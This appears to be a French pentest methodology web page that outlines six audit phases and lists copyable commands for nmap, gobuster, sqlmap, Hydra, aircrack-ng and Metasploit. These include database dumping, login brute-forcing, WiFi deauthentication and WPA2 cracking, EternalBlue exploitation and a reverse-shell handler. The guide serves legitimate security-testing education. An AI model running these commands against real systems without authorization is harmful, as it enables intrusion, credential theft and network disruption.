✓ Copié dans le presse-papier
Guide Pentest Pro · Cybersécurité

Pentest
Methodology

Guide professionnel de tests d'intrusion sous Parrot OS et Kali Linux. Méthodologie structurée, outils essentiels et commandes de référence.

Voir la méthodologie → Bibliothèque d'outils
6
Phases
30+
Outils
80+
Commandes
4
Checklists
root@parrot ~ pentest
nmap -sV -sC -oA scan 192.168.1.0/24
Starting Nmap 7.94 scan...
# Host: 192.168.1.10 — Open ports found
22/tcp open ssh OpenSSH 8.9
80/tcp open http Apache 2.4
443/tcp open https nginx
gobuster dir -u http://target -w common.txt
/admin [301]
/upload [200]
/api/v1 [200]
sqlmap -u "http://target/id=1" --dbs
Phases

Méthodologie de Pentest

Approche structurée en 6 phases pour un audit de sécurité complet et reproductible

01
Reconnaissance passive (OSINT)
Collecte d'informations sans interaction directe avec la cible. Analyse des sources publiques : WHOIS, DNS, réseaux sociaux, moteurs de recherche, certificats SSL, Github, Shodan. L'objectif est de cartographier la surface d'attaque sans être détecté.
WHOISDNS EnumShodantheHarvesterMaltegoGoogle DorksRecon-ng
02
Scan & Énumération active
Interaction directe avec la cible pour identifier les services actifs, versions logicielles, OS, et configurations. Scan de ports, détection de services, énumération SMB/SNMP/LDAP, découverte de répertoires web. Phase qui peut être détectée par les IDS/IPS.
NmapMasscanGobusterNiktoenum4linuxNetdiscoverDirsearch
03
Analyse des vulnérabilités
Croisement des informations collectées avec les bases CVE et les scanners de vulnérabilités. Identification des failles potentielles : CVE connues, mauvaises configurations, services obsolètes, mots de passe par défaut, injections SQL/XSS, failles d'authentification.
OpenVASNessusSQLmapWPScanCVE DatabaseSearchsploit
04
Exploitation
Exploitation des vulnérabilités identifiées pour obtenir un accès non autorisé. Utilisation de frameworks d'exploitation (Metasploit), exploits publics, techniques de pivoting, attaques par force brute. L'exploitation doit rester dans le périmètre défini par le contrat.
MetasploitExploit-DBHydraJohn the RipperResponderMimikatz
05
Post-exploitation & Pivoting
Après compromission initiale : élévation de privilèges, persistance, mouvements latéraux, exfiltration de données. Cartographie du réseau interne via la machine compromise. Évaluation de l'impact réel d'une compromission et de la propagation possible sur l'infrastructure.
MeterpreterBloodHoundImpacketCrackMapExecPowerViewChisel
06
Reporting & Recommandations
Rédaction du rapport d'audit avec synthèse exécutive et rapport technique détaillé. Classement des vulnérabilités par criticité (CVSS), preuves de concept, impact business, recommandations correctives priorisées. Présentation des résultats aux équipes techniques et dirigeantes.
CVSS ScoringOWASP Top 10PoCRapport PDFRemédiation
Arsenal

Bibliothèque d'Outils

Outils essentiels classés par catégorie et niveau de maîtrise

Référence

Commandes Essentielles

Cliquez sur une commande pour la copier dans le presse-papier

🔍Nmap — Scan réseauReconnaissance
Scan SYN rapide
nmap -sS -T4 -p- 192.168.1.0/24
Détection services + scripts
nmap -sV -sC -oA output 10.10.10.1
Scan UDP top ports
nmap -sU --top-ports 20 10.10.10.1
Vuln scan (scripts NSE)
nmap --script vuln -p80,443 10.10.10.1
OS detection
nmap -O -A 10.10.10.1
🌐Gobuster — Énumération webWeb
Brute force répertoires
gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt
Avec extensions
gobuster dir -u http://target -w common.txt -x php,html,txt
Sous-domaines (DNS)
gobuster dns -d target.com -w subdomains.txt
Fuzz paramètres
ffuf -u http://target/FUZZ -w wordlist.txt
💉SQLmap — Injection SQLWeb / Exploit
Test basique
sqlmap -u "http://target/?id=1" --dbs
Extraction tables
sqlmap -u "http://target/?id=1" -D dbname --tables
Dump colonnes
sqlmap -u "http://target/?id=1" -D db -T users --dump
Via POST + cookie
sqlmap -u "http://target/login" --data="user=1&pass=1" --cookie="PHPSESSID=abc"
🔑Hydra — Force bruteCracking
SSH brute force
hydra -l admin -P rockyou.txt ssh://10.10.10.1
HTTP POST login
hydra -l admin -P passwords.txt 10.10.10.1 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
FTP multi-users
hydra -L users.txt -P passwords.txt ftp://10.10.10.1
RDP
hydra -l administrator -P rockyou.txt rdp://10.10.10.1
📡Aircrack-ng — WiFiWiFi
Mode monitor
airmon-ng start wlan0
Scanner réseaux
airodump-ng wlan0mon
Capturer handshake WPA2
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
Déauthentification
aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
Crack WPA2
aircrack-ng capture.cap -w /usr/share/wordlists/rockyou.txt
Metasploit — FrameworkExploitation
Lancer MSF
msfconsole -q
Chercher exploit
search type:exploit name:eternalblue
Configurer et lancer
use exploit/windows/smb/ms17_010_eternalblue
Reverse shell handler
use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp
Checklists

Checklists d'Audit

Listes de vérification interactives — cliquez pour cocher les étapes

Environnements

Distributions de Pentest

Les distributions Linux spécialisées pour les tests de sécurité

Parrot OS
Distribution légère et complète orientée sécurité, vie privée et développement. Idéale pour les audits et la forensique numérique.
LégerSécuritéAnonymatForensique
Kali Linux
La référence du pentest. Distribution Debian avec plus de 600 outils de sécurité pré-installés. Standard de l'industrie pour les audits professionnels.
600+ outilsStandardMetasploitARM
BlackArch
Distribution Arch Linux avec plus de 2800 outils de sécurité. Pour les utilisateurs avancés qui veulent un contrôle total sur leur environnement.
2800+ outilsAvancéArchRolling